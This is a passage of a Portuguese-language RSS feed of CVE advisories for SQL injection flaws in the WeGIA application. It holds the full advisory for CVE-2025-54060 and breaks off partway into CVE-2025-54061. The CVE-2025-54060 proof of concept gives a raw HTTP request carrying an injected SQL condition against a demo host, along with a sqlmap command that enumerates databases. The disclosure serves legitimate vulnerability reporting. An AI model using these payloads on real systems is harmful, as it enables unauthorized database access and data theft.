&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 17 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-54060</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-54060/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-54060/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-54060-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-idatendido_familiares-do-endpoint-dependente_editarinfopessoalphp&amp;#34;&amp;gt;CVE-2025-54060: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;dependente_editarInfoPessoal.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54060&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54060&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/html/funcionario/dependente_editarInfoPessoal.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-54060-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-idatendido_familiares-do-endpoint-dependente_editarinfopessoalphp&amp;#34;&amp;gt;CVE-2025-54060: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;dependente_editarInfoPessoal.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54060&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54060&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/html/funcionario/dependente_editarInfoPessoal.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/html/funcionario/dependente_editarInfoPessoal.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Salve a requisição no arquivo &amp;lt;code&amp;gt;req.txt&amp;lt;/code&amp;gt;:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  POST /html/funcionario/dependente_editarInfoPessoal.php?id_pessoa=3&amp;amp;amp;idatendido_familiares=1&#43;AND&#43;7539=7538 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Host: demo.wegia.org
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Content-Type: application/x-www-form-urlencoded
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Content-Length: 119
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Origin: https://demo.wegia.org
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Referer: https://demo.wegia.org/html/funcionario/profile_dependente.php?id_dependente=1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Cookie: _ga_F8DXBXLV8J=GS2.1.s1751254790$o22$g1$t1751255920$j46$l0$h0; _ga=GA1.1.424189364.1749063834; PHPSESSID=bv1jv0i5nijrv1a3dkkimbp270
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  nome=Maria&amp;amp;amp;sobrenomeForm=Silva&amp;amp;amp;gender=f&amp;amp;amp;telefone=%2821%2998652-3758&amp;amp;amp;nascimento=1996-04-04&amp;amp;amp;nome_pai=teste&amp;amp;amp;nome_mae=teste
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Então, use o &amp;lt;code&amp;gt;sqlmap&amp;lt;/code&amp;gt;:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  sqlmap -r req.txt -p idatendido_familiares --risk=3 --level=5 --dbs --batch --dbms=mysql --batch
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-54060/image.png&amp;#34;
	width=&amp;#34;867&amp;#34;
	height=&amp;#34;782&amp;#34;
	srcset=&amp;#34;/p/cve-2025-54060/image_hu_1d34c10199db05d0.png 480w, /p/cve-2025-54060/image_hu_ce851de59c9a32ae.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;110&amp;#34;
		data-flex-basis=&amp;#34;266px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mw78-c4f6-2hq7&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mw78-c4f6-2hq7&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 17 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-54061</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-54061/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-54061/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-54061-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-idatendido_familiares-do-endpoint-dependente_editardocphp&amp;#34;&amp;gt;CVE-2025-54061: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;dependente_editarDoc.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54061&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54061&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/html/funcionario/dependente_editarDoc.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-54061-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-idatendido_familiares-do-endpoint-dependente_editardocphp&amp;#34;&amp;gt;CVE-2025-54061: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;dependente_editarDoc.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54061&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54061&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/html/funcionario/dependente_editarDoc.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/html/funcionario/dependente_editarDoc.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Salve a requisição no arquivo &amp;lt;code&amp;gt;req.txt&amp;lt;/code&amp;gt;:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
